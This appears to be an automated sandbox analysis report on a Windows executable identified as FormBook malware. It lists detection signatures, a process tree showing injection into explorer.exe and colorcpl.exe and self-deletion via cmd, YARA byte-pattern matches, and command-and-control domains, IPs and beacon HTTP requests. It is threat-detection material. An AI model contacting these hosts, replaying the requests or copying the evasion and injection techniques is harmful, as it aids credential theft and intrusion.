Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3cGH9Bakuq

Overview

General Information

Sample Name:3cGH9Bakuq (renamed file extension from none to exe)
Analysis ID:491574
MD5:0eca879131a7b104418b085db7f761c3
SHA1:07fa4692aa15a409091bc6190bf33b5942db99e6
SHA256:166559731ad15341f955bf8a16708f93542bef868c33f02f70e9b27f57b991a3
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 3cGH9Bakuq.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\3cGH9Bakuq.exe' MD5: 0ECA879131A7B104418B085DB7F761C3)
    • 3cGH9Bakuq.exe (PID: 6668 cmdline: C:\Users\user\Desktop\3cGH9Bakuq.exe MD5: 0ECA879131A7B104418B085DB7F761C3)
    • 3cGH9Bakuq.exe (PID: 6420 cmdline: C:\Users\user\Desktop\3cGH9Bakuq.exe MD5: 0ECA879131A7B104418B085DB7F761C3)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5908 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • colorcpl.exe (PID: 6676 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 1472 cmdline: /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 25 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x10f4f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x10f882:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x11b595:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11b081:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x11b697:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x11b80f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x11029a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11a2fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x111012:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x120a67:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x121b0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x11d999:$sqlite3step: 68 34 1C 7B E1
          • 0x11daac:$sqlite3step: 68 34 1C 7B E1
          • 0x11d9c8:$sqlite3text: 68 38 2A 90 C5
          • 0x11daed:$sqlite3text: 68 38 2A 90 C5
          • 0x11d9db:$sqlite3blob: 68 53 D8 7F 8C
          • 0x11db03:$sqlite3blob: 68 53 D8 7F 8C
          6.2.3cGH9Bakuq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            6.2.3cGH9Bakuq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 10 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: 3cGH9Bakuq.exeVirustotal: Detection: 26%Perma Link
            Source: 3cGH9Bakuq.exeReversingLabs: Detection: 22%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3cGH9Bakuq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3cGH9Bakuq.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: colorcpl.pdbGCTL source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: colorcpl.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.marmorariapiramide.online
            Source: C:\Windows\explorer.exeDomain query: www.emptycc.net
            Source: C:\Windows\explorer.exeDomain query: www.traexcel.com
            Source: C:\Windows\explorer.exeDomain query: www.rangerbuddys.com
            Source: C:\Windows\explorer.exeDomain query: www.omniriot.com
            Source: C:\Windows\explorer.exeNetwork Connect: 104.143.9.211 80
            Source: C:\Windows\explorer.exeDomain query: www.vetpipes.com
            Source: C:\Windows\explorer.exeNetwork Connect: 143.198.15.243 80
            Source: C:\Windows\explorer.exeNetwork Connect: 154.208.82.163 80
            Source: C:\Windows\explorer.exeNetwork Connect: 103.11.189.189 80
            Source: global trafficHTTP traffic detected: GET /scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1 HTTP/1.1Host: www.vetpipes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F HTTP/1.1Host: www.omniriot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu HTTP/1.1Host: www.rangerbuddys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpString found in binary or memory: http://050005.voodoo.com/js/partner.js
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: 3cGH9Bakuq.exeString found in binary or memory: http://kr.battle.net/heroes/ko/
            Source: 3cGH9Bakuq.exeString found in binary or memory: http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmp, 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: 3cGH9Bakuq.exe, 00000000.00000003.669096429.0000000005685000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667722258.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comh
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: 3cGH9Bakuq.exe, 00000000.00000003.670846550.00000000056BD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: 3cGH9Bakuq.exe, 00000000.00000003.673691153.00000000056BD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comdiafN
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoW
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comt
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnA.
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667177411.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cned
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnenx
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnh-c
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnorm
            Source: 3cGH9Bakuq.exe, 00000000.00000003.676148683.00000000056B7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpString found in binary or memory: http://www.vodien.com/
            Source: colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpString found in binary or memory: http://www.vodien.com/singapore-email-hosting.php
            Source: 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnA.
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnenx
            Source: 3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnh
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/account/verify_credentials.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/blocks/create.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/blocks/ids.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/direct_messages.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweets
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/create.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/destroy.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/favorites/list.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friends/ids.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friends/list.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friendships/no_retweets/ids.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/friendships/update.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/destroy/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/mentions_timeline.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/retweet/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/show.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timeli
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_c
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/1.1/users/lookup.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/oauth/access_token
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/oauth/authorize?oauth_token=
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://api.twitter.com/oauth/request_token
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://pbs.twimg.com/media/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://twitter.com/
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://twitter.com/Dalsae_info
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://twitter.com/hanalen_
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://upload.twitter.com/1.1/media/upload.json
            Source: 3cGH9Bakuq.exeString found in binary or memory: https://userstream.twitter.com/1.1/user.json
            Source: unknownDNS traffic detected: queries for: www.emptycc.net
            Source: global trafficHTTP traffic detected: GET /scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1 HTTP/1.1Host: www.vetpipes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F HTTP/1.1Host: www.omniriot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu HTTP/1.1Host: www.rangerbuddys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686274674.000000000098A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
